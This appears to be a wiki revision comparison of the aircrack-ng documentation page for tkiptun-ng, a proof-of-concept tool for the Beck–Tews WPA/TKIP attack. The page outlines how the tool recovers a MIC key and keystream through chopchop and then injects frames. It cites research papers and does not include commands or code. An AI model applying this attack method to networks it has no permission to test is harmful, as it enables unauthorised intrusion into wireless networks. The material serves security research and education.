Both sides previous revisionPrevious revisionNext revision | Previous revisionNext revisionBoth sides next revision |
tkiptun-ng [2009/03/05 23:06] – Added complete example of working output darkaudax | tkiptun-ng [2009/09/05 23:30] – wiki-files.aircrack-ng.org become download.aircrack-ng.org/wiki-files mister_x |
---|
===== Description ===== | ===== Description ===== |
| |
NOTE: This documention is still under development. Please check back on a regular basis to obtain the latest updates. If you have any feedback on the documentation, please post your comments to the [[http://forum.tinyshell.be|Forum]]. | NOTE: This documention is still under development. Please check back on a regular basis to obtain the latest updates. If you have any feedback on the documentation, please post your comments to the [[http://forum.aircrack-ng.org|Forum]]. |
| |
NOTE: The tkiptun-ng SVN version is not fully working. A working version will be released shortly. | **IMPORTANT NOTE:** The tkiptun-ng SVN version is not fully working. The final attack phase is not yet implemented. The other portions are working with the ieee80211 drivers for RT73 and RTL8187L chipsets. The madwifi-ng driver is definitely broken and is known to completely fail. tkiptun-ng may work with other drivers but has not been tested so your mileage may vary. |
| |
Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS. He worked with Erik Tews (who created PTW attack) for a conference in [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA". | Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS. He worked with Erik Tews (who created PTW attack) for a conference in [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA". |
| |
Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. This attack is described in the paper, [[http://dl.aircrack-ng.org/breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews. The paper describes advanced attacks on WEP and the first practical attack on WPA. An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://arstechnica.com/articles/paedia/wpa-cracked.ars/|Battered, but not broken: understanding the WPA crack]] by Glenn Fleishman. | Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. This attack is described in the paper, [[http://dl.aircrack-ng.org/breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews. The paper describes advanced attacks on WEP and the first practical attack on WPA. An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://arstechnica.com/security/news/2008/11/wpa-cracked.ars/|Battered, but not broken: understanding the WPA crack]] by Glenn Fleishman. |
| |
Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). This is done via [[chopchoptheory|chopchop]]-type method. Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated. | Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). This is done via [[chopchoptheory|chopchop]]-type method. Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated. |
| |
At this point, tkiptun-ng has recovered the MIC key and knows a keystram for access point to client communication. Subsequently, using the XOR file, you can create new packets and inject them. The creation and injection are done using the other aircrack-ng suite tools. | At this point, tkiptun-ng has recovered the MIC key and knows a keystram for access point to client communication. Subsequently, using the XOR file, you can create new packets and inject them. The creation and injection are done using the other aircrack-ng suite tools. |
| |
| [[http://download.aircrack-ng.org/wiki-files/doc/tkip_master.pdf|Cryptanalysis of IEEE 802.11i TKIP]] by Finn Michael Halvorsen and Olav Haugen, June 2009 provides an excellent detailed description of how tkiptun-ng works. As well, their paper includes detailed descriptions of many other attacks against WEP/WPA/WPA2. |
| |
Please remember this is an extremely advanced attack. You require advanced linux and aircrack-ng skills to use this tool. DO NOT EXPECT support unless you can demonstrate you have these skills. Novices will NOT BE SUPPORTED. | Please remember this is an extremely advanced attack. You require advanced linux and aircrack-ng skills to use this tool. DO NOT EXPECT support unless you can demonstrate you have these skills. Novices will NOT BE SUPPORTED. |